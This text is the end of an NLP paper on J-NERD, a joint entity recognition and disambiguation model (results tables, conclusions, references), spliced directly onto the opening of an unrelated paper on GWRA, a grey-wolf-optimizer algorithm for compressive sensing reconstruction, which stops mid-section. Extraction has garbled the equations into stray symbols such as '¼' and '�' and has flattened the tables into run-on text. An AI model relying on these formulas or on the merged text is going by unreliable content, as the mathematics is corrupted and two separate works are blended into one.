X: detected mentions, NER types, NED mappings. Following the ERD 2014 Chal- lenge (Carmel et al., 2014), we define precision and recall of X for end-to-end NERD as: Prec(X) = |X agrees with G| |X| Rec(X) = |X agrees with G| |G| where agreement means that X and G overlap in the text spans (i.e. have at least one token in common) for a mention, have the same NER type, and have the same mapping to an entity or out-of-kb. The F1 score of X is the harmonic mean of precision and recall. For evaluating mention boundary detection alone, we consider only the overlap of text spans; for evaluating NER completely, we consider both mention overlap and agreement on NER type. 6.2 Results for CoNLL-YAGO2 Our first experiment on CoNLL-YAGO2 is com- paring the four CRF variants of J-NERD for three tasks: mention boundary detection, NER typing and end-to-end NERD. Then, the best model of J-NERD is compared against various baselines and a pipelined configuration of our method. Fi- nally, we test the influence of different features groups. 6.2.1 Experiments on CRF Variants Table 1: Experiments on CoNLL-YAGO2. Perspective Variants Prec Rec F1 Mention Boundary Detection J-NERDlinear-local 94.2 89.6 91.8 J-NERDtree-local 94.4 89.4 91.8 J-NERDlinear-global 95.1 90.3 92.6 J-NERDtree-global 95.8 90.6 93.1 NER Typing J-NERDlinear-local 87.8 83.0 85.3 J-NERDtree-local 89.5 82.2 85.6 J-NERDlinear-global 88.6 83.4 85.9 J-NERDtree-global 90.4 83.8 86.9 End-to-End NERD J-NERDlinear-local 71.8 74.9 73.3 J-NERDtree-local 75.1 74.5 74.7 J-NERDlinear-global 77.6 74.8 76.1 J-NERDtree-global 81.9 75.8 78.7 Table 1 shows that all variants perform very well on boundary detection and NER typing, with small differences only. For end-to-end NERD, however, J-NERDtree-global outperforms all other variants by a large margin. This results in achiev- ing the best F1 score of 78.7%, which is 2.6% higher than J-NERDlinear-global. We performed a paired t-test between these two variants, and ob- tained a p-value of 0.01. The local variants of J- NERD lose around 4% of F1 because they do not capture the coherence among mentions in different sentences. In the rest of our experiments, we therefore fo- cus on J-NERDtree-global and the task of end-to-end NERD. 6.2.2 Comparison of Joint vs. Pipelined Models and Baselines In this subsection, we demonstrate the benefits of joint models against pipelined models including state-of-the-art baselines. In addition to the com- petitors introduced in 6.1.2, we add a pipelined configuration of J-NERD , named P-NERD. That is, we first run J-NERD in NER mode (only con- sidering NER features f1..7 and f14..16). The best sequence of NER labels is then given to J-NERD to run in NED mode (only considering NED fea- tures f8..13 and f17). Table 2: Comparison between joint models and pipelined models on end-to-end NERD. Method Prec Rec F1 P-NERD 80.1 75.1 77.5 J-NERD 81.9 75.8 78.7 AIDA-light 78.7 76.1 77.3 TagMe 64.6 43.2 51.8 SpotLight 71.1 47.9 57.3 The results are shown in Table 2. J-NERD achieves the highest precision of 81.9% for end- to-end NERD, outperforming all competitors by a large margin. This results in achieving the best F1 score of 78.7%, which is 1.2% higher than P- NERD and 1.4% higher than AIDA-light. Note that (Nguyen et al., 2014) reported higher preci- sion for AIDA-light, but that experiment did not consider out-of-kb entities which pose an ex- tra difficulty in our setting. Also, the test corpora – CoNLL-YAGO2 vs. CoNLL-YAGO – are not quite comparable (see above). TagMe and Spotlight are clearly inferior on this dataset (more than 20% lower in F1 than J- NERD). It seems these systems are more geared for efficiency and coping with popular and thus frequent entities, whereas the CoNLL-YAGO2 dataset contains very difficult test cases. For the best F1 score of J-NERD, we performed a paired t-test against the other methods’ F1 values and determined a p-value of 0.075. We also compared the NER performance of J-NERD against the state-of-the-art method for NER alone, the Stanford NER Tagger version 3.4.1. For mention boundary detection, J-NERD achieved an F1 score of 93.1% versus 93.4% by Stanford NER and 92.9% by P-NERD. For NER typing, J-NERD achieved an F1 score of 86.9% versus 86.8% by Stanford NER and 86.3% by P- NERD. So we could not outperform the best prior method for NER alone, but achieved very compet- itive results. Here, we do not really leverage any form of joint inference (combining CRF’s across sentences is used in Stanford NER, too), but har- ness rich features on domains, entity candidates, and linguistic dependencies. 6.2.3 Influence of Features To analyze the influence of the features, we per- formed an additional ablation study on the global J-NERD tree model, which is the best variant of J-NERD , as follows: • Standard features only include features intro- duced in Section 4.1. • Standard and domain features exclude the lin- guistic features f14,f15,f16,f17. • Standard and linguistic features excludes the domain features f12 and f13. • All features is the full-fledged J-NERDtree-global model. Table 3: Feature Influence on CoNLL-YAGO2. Perspective Setting F1 NER Typing Standard features 85.1 Standard and domain features 85.7 Standard and linguistic features 86.4 All features 86.9 End-to-End NERD Standard features 74.3 Standard and domain features 76.4 Standard and linguistic features 76.6 All features 78.7 Table 3 shows the results, demonstrating that linguistic features are crucial for both NER and NERD. For example, in the sentence “Woolmer played 19 tests for England”, the mention “Eng- land” refers to an organization (the English cricket team), not to a location. The dependency-type fea- ture prep for[play, England] is a decisive cue to handle such cases properly. Domain features help in NED to eliminate, for example, football teams when the domain is cricket. 6.3 End-to-End NERD on ACE For comparison to the recently developed Berkeley-entity system (Durrett and Klein, 2014), the authors of that system provided us with detailed results for the entity-annotated ACE’2005 corpus, which allowed us to discount non-entity (so-called “NOM-type”) mappings (see Subsection 6.1.1). All other systems, including the best J-NERD method, were run on the corpus under the same conditions. Table 4: NERD results on ACE. Method Prec Rec F1 P-NERD 68.2 60.8 64.2 J-NERD 69.1 62.3 65.5 Berkeley-entity 65.6 61.8 63.7 AIDA-light 66.8 59.3 62.8 TagMe 60.6 43.5 50.7 SpotLight 68.7 29.6 41.4 J-NERD outperforms P-NERD and Berkeley- entity: F1 scores are 1.3% and 1.8% better, re- spectively, with a t-test p-value of 0.05 (Table 4). Following these three best-performing systems, AIDA-light also achieves decent results. The other systems show substantially inferior performance. The performance gains that J-NERD achieves over Berkeley-entity can be attributed to two fac- tors. First, the rich linguistic features of J-NERD help to correctly cope with some difficult cases, e.g., when common nouns are actually names of people. Second, the coherence features of global J-NERD help to properly couple decisions on re- lated entity mentions. 6.4 End-to-End NERD on ClueWeb The results for ClueWeb are shown in Table 5. Again, J-NERD outperforms all other systems with a t-test p-value of 0.05. The differences be- tween J-NERD and fast NED systems such as TagMe or SpotLight become smaller as the num- ber of prominent entities (i.e., prominent people, organizations and locations) is higher on ClueWeb than on CoNLL-YAGO2. Table 5: NERD results on ClueWeb. Dataset Method Prec Rec F1 ClueWeb P-NERD 80.9 67.1 73.3 J-NERD 81.5 67.5 73.8 AIDA-light 80.2 66.4 72.6 TagMe 78.4 60.5 68.3 SpotLight 79.7 57.1 66.5 ClueWeblong−tail P-NERD 81.2 64.4 71.8 J-NERD 81.4 65.1 72.3 AIDA-light 81.2 63.7 71.3 TagMe 78.4 58.3 66.9 SpotLight 81.2 56.3 66.5 7 Conclusions We have shown that coupling the tasks of NER and NED in a joint CRF model is beneficial. Our J-NERD method outperforms strong baselines on a variety of test datasets. The strength of J-NERD comes from three novel assets. First, our tree CRF’s capture the structure of dependency parse trees, and we couple multiple of such tree mod- els across sentences. Second, we harness non- standard features about domains and novel fea- tures for linguistic patterns derived from parsing. Third, our joint inference maintains uncertain can- didates for both mentions and entities and makes decisions as late as possible. In our future work, we plan to explore use cases for joint NERD, espe- cially for content analytics over news streams and social media. References Luisa Bentivogli, Pamela Forner, Bernardo Magnini, and Emanuele Pianta. 2004. Revising the Wordnet Domains Hierarchy: Semantics, Coverage and Bal- ancing. In Proceedings of the Workshop on Multi- lingual Linguistic Ressources, MLR ’04, pages 101– 108. ACL. Luisa Bentivogli, Pamela Forner, Claudio Giu- liano, Alessandro Marchetti, Emanuele Pianta, and Kateryna Tymoshenko. 2010. Extending En- glish ACE 2005 Corpus Annotation with Ground- truth Links to Wikipedia. In The People’s Web Meets NLP: Collaboratively Constructed Semantic Resources ’10, pages 19–27. COLING. Razvan Bunescu and Marius Pasca. 2006. Using Encyclopedic Knowledge for Named Entity Disam- biguation. In EACL ’06, pages 9–16. ACL. David Carmel, Ming-Wei Chang, Evgeniy Gabrilovich, Bo-June Paul Hsu, and Kuansan Wang. 2014. ERD’14: Entity Recognition and Disambiguation Challenge. In SIGIR ’14, page 1292. ACM. Marco Cornolti, Paolo Ferragina, and Massimiliano Ciaramita. 2013. A Framework for Benchmark- ing Entity-annotation Systems. In WWW ’13, pages 249–260. ACM. Marco Cornolti, Paolo Ferragina, Massimiliano Cia- ramita, Hinrich Schütze, and Stefan Rüd. 2014. The SMAPH System for Query Entity Recognition and Disambiguation. In Proceedings of the First Inter- national Workshop on Entity Recognition and Dis- ambiguation, ERD ’14, pages 25–30. ACM. Bruce Croft, Donald Metzler, and Trevor Strohman. 2009. Search Engines: Information Retrieval in Practice. Addison-Wesley Publishing Company. Silviu Cucerzan. 2007. Large-Scale Named En- tity Disambiguation Based on Wikipedia Data. In EMNLP-CoNLL ’07, pages 708–716. ACL. Silviu Cucerzan. 2014. Name Entities Made Obvious: The Participation in the ERD 2014 Evaluation. In Proceedings of the First International Workshop on Entity Recognition and Disambiguation, ERD ’14, pages 95–100. ACM. Hamish Cunningham, Diana Maynard, Kalina Bontcheva, et al. 2011. Text Processing with GATE. University of Sheffield. Joachim Daiber, Max Jakob, Chris Hokamp, and Pablo N. Mendes. 2013. Improving Efficiency and Accuracy in Multilingual Entity Extraction. In Pro- ceedings of the 9th International Conference on Se- mantic Systems, I-SEMANTICS ’13, pages 121–124. ACM. Marie-Catherine de Marneffe, Bill MacCartney, and Christopher D. Manning. 2006. Generating typed dependency parses from phrase structure parses. In Proceedings of the International Conference on Language Resources and Evaluation, LREC ’06, pages 449–454. ELRA. Stephen Dill, Nadav Eiron, David Gibson, et al. 2003. SemTag and Seeker: Bootstrapping the Semantic Web via Automated Semantic Annotation. In WWW ’03, pages 178–186. ACM. Greg Durrett and Dan Klein. 2014. A Joint Model for Entity Analysis: Coreference, Typing, and Linking. In TACL ’14. ACL. Paolo Ferragina and Ugo Scaiella. 2010. TAGME: On-the-fly Annotation of Short Text Fragments (by Wikipedia Entities). In CIKM ’10, pages 1625– 1628. ACM. Jenny Rose Finkel, Trond Grenager, and Christopher Manning. 2005. Incorporating Non-local Informa- tion into Information Extraction Systems by Gibbs Sampling. In ACL ’05, pages 363–370. ACL. Michael Fleischman and Eduard Hovy. 2002. Fine Grained Classification of Named Entities. In COL- ING ’02, pages 1–7. ACL. Johannes Hoffart, Mohamed Amir Yosef, Ilaria Bor- dino, Hagen Fürstenau, Manfred Pinkal, Marc Span- iol, Bilyana Taneva, Stefan Thater, and Gerhard Weikum. 2011. Robust Disambiguation of Named Entities in Text. In EMNLP ’11, pages 782–792. ACL. Johannes Hoffart, Stephan Seufert, Dat Ba Nguyen, Martin Theobald, and Gerhard Weikum. 2012. KORE: Keyphrase Overlap Relatedness for Entity Disambiguation. In CIKM ’12, pages 545–554. ACM. Johannes Hoffart, Fabian M. Suchanek, Klaus Berberich, and Gerhard Weikum. 2013. YAGO2: A Spatially and Temporally Enhanced Knowledge Base from Wikipedia. AI vol. 194, pages 28–61. Johannes Hoffart, Yasemin Altun, and Gerhard Weikum. 2014. Discovering Emerging Entities with Ambiguous Names. In WWW ’14, pages 385–396. ACM. Daphne Koller, Nir Friedman, Lise Getoor, and Ben- jamin Taskar. 2007. Graphical Models in a Nut- shell. In An Introduction to Statistical Relational Learning. MIT Press. Sayali Kulkarni, Amit Singh, Ganesh Ramakrishnan, and Soumen Chakrabarti. 2009. Collective Annota- tion of Wikipedia Entities in Web Text. In KDD ’09, pages 457–466. ACM. Xiao Ling and Daniel S. Weld. 2012. Fine-grained Entity Recognition. In AAAI ’12. AAAI Press. Dong C. Liu and Jorge Nocedal. 1989. On the Limited Memory BFGS Method for Large Scale Optimiza- tion. Mathematical Programming vol. 45, pages 503–528. Bernardo Magnini and Gabriela Cavagli. 2000. Inte- grating subject field codes into wordnet. In Proceed- ings of the international conference on Language resources and evaluation, LREC ’00, pages 1413– 1418. ELRA. Andrew McCallum and Wei Li. 2003. Early Re- sults for Named Entity Recognition with Condi- tional Random Fields, Feature Induction and Web- enhanced Lexicons. In HLT-NAACL ’03, pages 188–191. ACL. Edgar Meij, Wouter Weerkamp, and Maarten de Rijke. 2012. Adding Semantics to Microblog Posts. In Proceedings of the Fifth ACM International Confer- ence on Web Search and Data Mining, WSDM ’12, pages 563–572. ACM. Pablo N. Mendes, Max Jakob, Andrés Garcı́a-Silva, and Christian Bizer. 2011. Dbpedia Spotlight: Shedding Light on the Web of Documents. In Proceedings of the 7th International Conference on Semantic Systems, I-SEMANTICS ’11, pages 1–8. ACM. George A. Miller. 1995. Wordnet: A lexical database for english. pages 39–41. ACM. David Milne and Ian H. Witten. 2008. Learning to Link with Wikipedia. In CIKM ’08, pages 509–518. ACM. David Milne and Ian H. Witten. 2013. An Open-source Toolkit for Mining Wikipedia. Artificial Intelligence vol. 194, pages 222–239. Ndapandula Nakashole, Tomasz Tylenda, and Gerhard Weikum. 2013. Fine-grained Semantic Typing of Emerging Entities. In ACL ’13, pages 1488–1497. ACL. Dat Ba Nguyen, Johannes Hoffart, Martin Theobald, and Gerhard Weikum. 2014. AIDA-light: High- Throughput Named-Entity Disambiguation. In Pro- ceedings of the Workshop on Linked Data on the Web, LDOW ’14. CEUR-WS.org. Alexandre Passos, Vineet Kumar, and Andrew McCal- lum. 2014. Lexicon infused phrase embeddings for named entity resolution. In Proceedings of the Eigh- teenth Conference on Computational Natural Lan- guage Learning, CoNLL ’14, pages 78–86. ACL. Altaf Rahman and Vincent Ng. 2010. Inducing Fine- grained Semantic Classes via Hierarchical and Col- lective Classification. In COLING ’10, pages 931– 939. ACL. Lev Ratinov and Dan Roth. 2009. Design Challenges and Misconceptions in Named Entity Recognition. In CoNLL ’09, pages 147–155. ACL. Lev Ratinov, Dan Roth, Doug Downey, and Mike An- derson. 2011. Local and Global Algorithms for Dis- ambiguation to Wikipedia. In HLT ’11, pages 1375– 1384. ACL. Avirup Sil and Alexander Yates. 2013. Re-ranking for Joint Named-Entity Recognition and Linking. In CIKM ’13, pages 2369–2374. ACM. Valentin I. Spitkovsky and Angel X. Chang. 2012. A Cross-Lingual Dictionary for English Wikipedia Concepts. In Proceedings of the international conference on Language resources and evaluation, LREC ’12. ELRA. Charles A. Sutton and Andrew McCallum. 2012. An Introduction to Conditional Random Fields. Foun- dations and Trends in Machine Learning vol. 4, pages 267–373. Ricardo Usbeck, Michael Röder, Axel-Cyrille Ngonga Ngomo, et al. 2015. GERBIL – general entity anno- tation benchmark framework. In WWW ’15. ACM. Mohamed Amir Yosef, Sandro Bauer, Johannes Hof- fart, Marc Spaniol, and Gerhard Weikum. 2012. HYENA: Hierarchical Type Classification for Entity Names. In COLING ’12, pages 1361–1370. ACL. work_dvt43m6lunfqncjpyuav4zbr6y ---- GWRA: grey wolf based reconstruction algorithm for compressive sensing signals GWRA: grey wolf based reconstruction algorithm for compressive sensing signals Ahmed Aziz1, Karan Singh2, Ahmed Elsawy1, Walid Osamy1 and Ahmed M. Khedr3 1 Computer Science Department, Faculty of Computers and Artificial Intelligence, Benha University, Benha, Egypt 2 School of Computer and Systems Sciences, Jawaharlal Nehru University, New Delhi, Delhi, India 3 Department of Computer Science, University of Sharjah, Sharjah, UAE, United Arab Emirates ABSTRACT The recent advances in compressive sensing (CS) based solutions make it a promising technique for signal acquisition, image processing and other types of data compression needs. In CS, the most challenging problem is to design an accurate and efficient algorithm for reconstructing the original data. Greedy-based reconstruction algorithms proved themselves as a good solution to this problem because of their fast implementation and low complex computations. In this paper, we propose a new optimization algorithm called grey wolf reconstruction algorithm (GWRA). GWRA is inspired from the benefits of integrating both the reversible greedy algorithm and the grey wolf optimizer algorithm. The effectiveness of GWRA technique is demonstrated and validated through rigorous simulations. The simulation results show that GWRA significantly exceeds the greedy-based reconstruction algorithms such as sum product, orthogonal matching pursuit, compressive sampling matching pursuit and filtered back projection and swarm based techniques such as BA and PSO in terms of reducing the reconstruction error, the mean absolute percentage error and the average normalized mean squared error. Subjects Artificial Intelligence, Computer Networks and Communications, Network Science and Online Social Networks Keywords Average normalized mean squared error, Compressive sensing, Greedy-based reconstruction algorithm, Grey wolf optimizer, Mean absolute percentage error, Reconstruction algorithms INTRODUCTION Exploiting the sparse nature of the signals is highly challenging in various signal processing applications such as signal compression, inverse problems and this motivated the development of compressive sensing (CS) methodologies (Donoho, 2006). CS provides an alternative new method of compressing data, offering a new signal sampling theory which we can adopt in variety of applications including data and sensor networks (Cevher & Jafarpour, 2010), medical systems, image processing and video camera, signal detection, analog-to-digital convertors (Choi et al., 2010) and several other applications. The CS reconstruction problems are solved by convex algorithms and greedy algorithms (GAs). Convex algorithms are not efficient because they require high complex computations. Thus, most of researchers choose GAs, which are faster and give the same performance as convex algorithms in terms of minimum reconstruction error. On the other hand, GAs do How to cite this article Aziz A, Singh K, Elsawy A, Osamy W, Khedr AM. 2019. GWRA: grey wolf based reconstruction algorithm for compressive sensing signals. PeerJ Comput. Sci. 5:e217 DOI 10.7717/peerj-cs.217 Submitted 11 March 2019 Accepted 22 July 2019 Published 2 September 2019 Corresponding author Ahmed Aziz, ahmed.aziz@fci.bu.edu.eg Academic editor Xiangjie Kong Additional Information and Declarations can be found on page 23 DOI 10.7717/peerj-cs.217 Copyright 2019 Aziz et al. Distributed under Creative Commons CC-BY 4.0 http://dx.doi.org/10.7717/peerj-cs.217 mailto:ahmed.�aziz@�fci.�bu.�edu.�eg https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.217 http://www.creativecommons.org/licenses/by/4.0/ http://www.creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ not give a global solution as all heuristics algorithms that execute blind search and usually stuck on local optima. In this paper, we use grey wolf optimizer (GWO), which is considered as a meta heuristic algorithm that is prominent in finding global solution. Only a few works involving swarm algorithms have been proposed to solve CS reconstruction problem such as in Bao et al. (2018) and Du, Cheng & Liu (2013) where the authors used BAT and PSO algorithms to reconstruct the CS data. However, these two algorithms (Bao et al., 2018; Du, Cheng & Liu, 2013) have a number of drawbacks such as slow convergence velocity and tend to fall in local optimum status easily. In contrast, the GWO algorithm showed better performance than other swarm optimization algorithms (Mirjalili, Mohammad Mirjalili & Lewis, 2014). PROBLEM FORMULATION Consider x[n], where n = 1, 2 : : : N, denotes sensor nodes reading vector set, N represents the count of sensor nodes. Any individual signal in RN can be expressed using basis of N � 1 vectors {�i}i=1 N . Employing the basis N � N matrix, expressed as =[�1|�2|�3|....|�N], together with the vectors �i being the columns, we can represent the signal x as given below (Donoho, 2006): x ¼ XN i¼1 gi �i: (1) This representation is done in terms of N � N orthonormal basis transform matrix. Here, g denotes the N � 1 sparse presentation of x. CS focuses on signals with a sparse representation. The number of basis vectors of x is S, such that S << N. Also we have, (N - S) values of g are zeros and only S values are non-zeros. Using Eq. (1), the compressed samples y (compressive measurements) can be obtained as: y ¼ fx ¼ f�g ¼ ug: (2) Here, the compressed samples vector y ∈ RM, with M << N and θ is M � N matrix. The challenge of solving an undetermined set of linear equations have motivated the researchers to investigate upon this problem and as a result, diverse practical applications emerged to meet this challenge. In CS approach, the main responsibility is to offer an efficient reconstruction method enabling the recovery of the large and sparse signal with the help of a few available measurement coefficients. The reconstruction of signal using this available incomplete set of measurements is really challenging and relies on the sparse representation of signal. An easiest approach for recovering the original inherent sparse signal using its small set of linear measurements as shown in Eq. (2) is to compute the number of non-zero entries obtained by solving ‖L‖0 minimization problem. The reconstruction problem can thus be expressed as x ¼ arg min xk k0 subject to y ¼ fx (3) The ‖L‖0 minimization problem works well in theoretical aspects, but in general, it is an NP-hard problem (Mallat & Wavelet, 1999; Candes & Tao, 2006) and hence Eq. (3) is computationally intractable for any vector or matrix. Aziz et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.217 2/25 http://dx.doi.org/10.7717/peerj-cs.217 https://peerj.com/computer-science/ The main task involved in CS is to reconstruct the compressed sparsely sampled signal, involving solutions to an undetermined set of linear equations, with undefined set of solutions. Therefore, an efficient reconstruction algorithm is required to recover the inherent sparse signal. Main aim of signal reconstruction procedure is to evaluate the possible solutions derived from the inverse equation defined above so that it is possible to find the most appropriate estimate of the original sparse signal. The original signal reconstruction problem can be viewed as an optimization problem and numerous algorithms have been proposed with this intention. According to the CS method, the reconstruction algorithms for recovering the original sparse signal can be broadly categorized into two types: (i) convex relaxation, (ii) GA. Convex relaxation based optimization corresponds to a class of algorithms which make use of linear programming approach to solve the reconstruction problem. These techniques are capable of finding optimal/near optimal solutions to the reconstruction issues, but they have relatively high computational complexity. The examples for such algorithms are least absolute shrinkage and selection operator, basis pursuit and basis pursuit de-noising. In order to overcome the computational complexity of recovering the sparse signal, a family of GA/iterative algorithms have been introduced. GA solves the reconstruction problem in greedy/iterative fashion, with reduced complexity (Chartrand & Yin 2008). Therefore, GA is more adoptable for signal reconstruction in CS. GA techniques are classified into two categories: (i) reversible, (ii) irreversible. Both of them follows identical steps, detects the support-set making use of matched filter (MF) and after that constructs the original sparse signal using least squares (LS) method. In reversible GA, an element inserted to the support-set can be removed anytime, following a backward step. However, in irreversible GA, an element inserted to the support-set will remain there until the search ends. Examples for reversible GA includes sum product (SP; Dai & Milenkovic, 2009), compressive sampling matching pursuit (CoSaMP; Needell & Tropp, 2009) etc., whereas orthogonal matching pursuit (OMP; Tropp & Gilbert, 2007) belongs to the class of irreversible GA algorithms. The authors of Mirjalili, Mohammad Mirjalili & Lewis (2014) proposed a swarm intelligent technique, GWO, well tested with 29 benchmark functions. The benchmark functions used are minimization functions and are divided into four groups: unimodal, multimodal, fixed-dimension multimodal and composite functions. The GWO algorithm is compared to PSO as an SI-based technique and GSA as a physics-based algorithm. In addition, the GWO algorithm is compared with three EAs: DE, fast evolutionary programing and evolution strategy with covariance matrix adaptation. The results showed that GWO is able to provide highly competitive results compared to well-known heuristics such as PSO, GSA, DE, EP and ES. First, the results on the unimodal functions showed the superior exploitation of the GWO algorithm. Second, the exploration ability of GWO is confirmed by the results on multimodal functions. Third, the results of the composite functions showed high local optima avoidance. Finally, the convergence analysis of GWO confirmed the convergence of this algorithm. Finding the global optimum precisely requires balancing the exploration and exploitation (i.e., good equilibrium) and this balance can be achieved using GWO (Faris et al., 2018). Aziz et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.217 3/25 http://dx.doi.org/10.7717/peerj-cs.217 https://peerj.com/computer-science/ Here, we propose a new grey wolf based reconstruction algorithm (GWRA) for CS signal reconstruction. GWRA algorithm is inspired from the GWO and the reversible GA. GWRA has two forward steps (GA forward and GWO forward) and one backward step. During the first iteration, GWRA matches filter detection to initialize the support set (GA forward step) and adds q elements to it. Then, GWRA increases the search space in this iteration by selecting extra K elements depending on GWO algorithm (GWO forward step) and then solves the LS equation to select the best k elements from q + K elements (backward step). Summary of the contributions in this paper: 1. Develop a novel reconstruction algorithm based on grey wolf optimizer (GWRA) that: (a) utilizes the advantages of GAs to initialize the forward steps and (b) utilizes the advantages of GWO algorithm that enlarges the search space to determine the optimal output and recover the data. 2. Provide extensive experiments, and the subsequent results illustrate that GWRA exhibit high performance results than the existing techniques in terms of reconstruction error. The rest of this paper is divided as follows: the related research of the proposed problem is described in the section “Related Research.” In the section “Grey Wolf Optimizer Background” presents the GWO background. Then in section “Grey Wolf Reconstruction Based Algorithm,” we introduce our method to solve the proposed problem with the illustration of a numerical example scenario. The simulation results of our approach and a case study scenario is given in the section “Simulation Results.” Finally, the paper is concluded in the section “Conclusion.” Table 1 explains the abbreviations which are used this manuscript. Table 2 shows the notations used throughout the paper. RELATED RESEARCH Compressive sensing has become an attractive approach, convenient for use in internet of things (IoT) platforms, which utilizes the sparse nature of sensor signals. The signal is compressed (reduce signal dimension) from N to M such that M << N, which will result in Table 1 The following abbreviations are used in this manuscript. CS Compressive sensing IoT Internet of things MAPE Mean absolute percentage error GA Greedy algorithm ANMSE Average normalized mean squared error CoSaMP Compressive sampling matching pursuit OMP Orthogonal matching pursuit algorithm GWO Grey wolf optimizer MP Matching pursuit FBP Filtered back projection SP Sum-product algorithm BP Basis pursuit Aziz et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.217 4/25 http://dx.doi.org/10.7717/peerj-cs.217 https://peerj.com/computer-science/ transmission of fewer samples, making it suitable for IoT applications that hold continuous data. The main challenge in CS approach is to provide reconstructed signal with an acceptable quality. Several reconstruction algorithms have been developed to meet this requirement. The convex reconstruction approach converts the problem defined in Eq. (3) to convex optimization problem, replacing non-convex L0 minimization problem with convex L1, as defined in Eq. (4). x ¼ arg min xk k1 subject to y ¼ fx (4) Equation (4) is then solved using the L1-magic toolbox (Davenport et al., 2010) or any such problem solvers or using any linear programming methods. Although these techniques are capable of finding optimal/near optimal solutions to the reconstruction issues, the relatively high computational complexity make them inappropriate for IoT applications. On the other hand, GA-based algorithms could be suitable for IoT networks, as they solve the reconstruction problem with low computation and reduced complexity. In Mallat & Zhang (1993) matching pursuit algorithm (MP) is considered as the first GA based algorithm in which the support-set is initialized by the index of the largest Table 2 Table of notations. Notation Description x Original signal M Number of measurements y Compressed sample f CS matrix � Transform matrix K Signal sparsity level g Sparse presentation of x r Residual of y X Wolf position Xp Prey position q Number of selected columns by Wolf algorithm Xa a Wolf position Xβ β Wolf position Xd d Wolf position R Support set C Search set 4c Sub-matrix contains columns with indices c from 4 matrix best Best solution or Xa Secbest Second best solution or Xβ thirbest Third best solution or Xd f Fitness value x′ Estimated solution t Number of iterations † Pseudo-inverse L Indices set of largest K magnitude entries in ’c yy Aziz et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.217 5/25 http://dx.doi.org/10.7717/peerj-cs.217 https://peerj.com/computer-science/ magnitude entries in 4Ty, this step is called forward step and then it solves the LS problem. However, MP algorithm does not consider the non-orthogonality of the CS matrix which leads to incorrect selection to the columns corresponding to the non-zero values. This drawback has been solved by OMP algorithm (Tropp & Gilbert, 2007). The OMP algorithm selects the index of the largest magnitude entries in 4Tr during each iteration, where r is the residual of y, and then solves the LS problem. Different algorithms have been proposed based on OMP algorithm as in Donoho et al. (2012) and Needell & Vershynin (2009). In Donoho et al. (2012), a faster and enhanced version of OMP called stagewise OMP (StOMP) is proposed. StOMP enhances the forward step of OMP by selecting a number of columns, instead of one column as in OMP, the magnitude values of the columns in 4Tr are greater than a threshold and then uses these columns for solving the LS problem. In Needell & Vershynin (2009), in each iteration, the inner-products with similar magnitudes are grouped into sets and the maximum energy set is then selected. The above algorithms are classified as irreversible GA class, as they do not have a backward step. Backward step allows the algorithm to remove the wrong selection of elements during the forward step, i.e., in these algorithms, once an element is inserted to the support-set this element remains there until the search ends. However, in reversible GAs such as SP (Dai & Milenkovic, 2009), IHT (Cevher & Jafarpour, 2010), CoSaMP (Needell & Tropp, 2009) and filtered back projection (FBP; Burak & Erdogan, 2013) algorithms, backward step is used to prune the wrong elements that have been added to the support-set during the forward step. In CoSaMP and SP, initialization of support-set is done by placing the indices of b largest-magnitude components of F′y. The size of b is different in each algorithm, for example, b = K in SP and b = 2K in CoSaMP where the value of sparsity level K is known. On the other hand, FBP (Burak & Erdogan, 2013) algorithm has the ability to perform without the knowledge of K. It assigns forward and backward step size depending on the measurements size. In Cevher & Jafarpour (2010), the IHT algorithm considers iterative gradient search algorithm which updates the estimate-set depending on e gradient of the residue and keeps only the largest K entries by removing the wrong selection. Even though GA based reconstruction have become significantly popular for recovery of CS signals, in general they do not provide optimal solution to the problem of CS reconstruction (Du, Cheng & Chen, 2014). In Bao et al. (2018), the authors utilized the efficiency of the swarm algorithm BAT in finding the optimal solution of CS reconstruction problem. Also, in Du, Cheng & Liu (2013), PSO algorithm is used for CS data reconstruction. The results showed that GWO is able to provide highly competitive results compared to well-known heuristics algorithms such as PSO, GSA, DE, EP and ES (Mirjalili, Mohammad Mirjalili & Lewis, 2014). In contrast, the GWO algorithm displays better performance than other swarm optimization algorithms. Here, we introduce a new technique (GWRA), integrating the advantages of both GA and GWO in determining the optimal output for the desired problem of CS reconstruction. Aziz et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.217 6/25 http://dx.doi.org/10.7717/peerj-cs.217 https://peerj.com/computer-science/ GREY WOLF OPTIMIZER BACKGROUND Grey wolf optimizer can be defined as an intelligent meta-heuristic approach, inspired by group hunting behavior of grey wolves (Mirjalili, Mohammad Mirjalili & Lewis, 2014). The GWO method simulates the social behavior and hierarchy of grey wolves and their hunting method. The hierarchal leadership divides the grey wolves into four categories: (i) alpha (a), (ii) beta (β), (iii) delta (d) and (iv) omega (v) as shown in Fig. 1. The a grey wolves are principally the leaders of their strict dominant hierarchy, responsible and powerful for decision making and leads the whole group during hunting, feeding, migration etc. The subordinates of alpha wolves are called β wolves and they are placed on the second level of the grey wolves’ hierarchy. They act as advisors and help the alpha wolves in making decisions. Finally, d wolves execute alpha and beta wolves’ decision and manage v wolves which are considered as the lowest ranking members of grey wolves hierarchy. In GWO, a, β and d guide the optimization process, where GWO considers the best solution and position for a wolves. In addition, the second and third best solutions and positions are assigned for β and d, respectively. The other solutions are called v solutions which always follow the solution of the other three wolves. The mathematical representation of surrounding the prey and hunting process in GWO algorithm can be modelled as follows: Surrounding the prey In the hunting process, the first step of grey wolves is “surrounding the prey,” which can be expressed mathematically as: D ¼ CXp � x tð Þ �� (5) X t þ 1ð Þ ¼ Xp � AD (6) Equation (5) expresses the distance between the wolf and the prey, where X is the wolf position, Xp is the prey position, t denotes the current iteration and C is coefficient vector which can be calculated using Eq. (7). The wolf’s position is updated using Eq. (6), where A denotes the coefficient vector and it can be calculated using Eq. (8). C ¼ 2r2 (7) A ¼ 2ar1 � a (8) Figure 1 Grey wolfs’ hierarchal leadership (Faris et al., 2018). Full-size DOI: 10.7717/peerj-cs.217/fig-1 Aziz et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.217 7/25 http://dx.doi.org/10.7717/peerj-cs.217/fig-1 http://dx.doi.org/10.7717/peerj-cs.217 https://peerj.com/computer-science/ Here, r1 and r2 are random values in [0, 1] and the values of a’s linearly decrease from 2 to 0 in each iteration. GWO hunting process After surrounding 